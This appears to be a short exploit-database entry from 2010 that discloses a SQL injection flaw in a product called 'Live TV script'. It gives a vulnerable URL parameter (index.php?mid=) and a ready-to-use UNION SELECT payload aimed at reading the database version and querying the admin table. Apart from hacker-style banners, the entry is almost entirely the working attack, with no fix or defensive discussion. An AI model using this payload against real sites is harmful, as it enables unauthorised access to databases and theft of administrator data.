id: 10584
date: 01/03/2010
title: Live TV Script SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

==========================================
Live TV Script SQL Injection Vulnerability
==========================================

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: Live TV script suffer from remote sql injection
[~] Vendor: livetvscript.com
[?] Software: Live TV script
[?]
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????
 
 
[*] Err0r C0N50L3:
 
 
http://server/p47h/index.php?mid={EV!L EXPLO!T}
 
[~] {EV!L EXPLO!T}:
 
-666+union+all+select+1,@@version,3,4+from+admin--



#  0day.today [2023-03-25]  #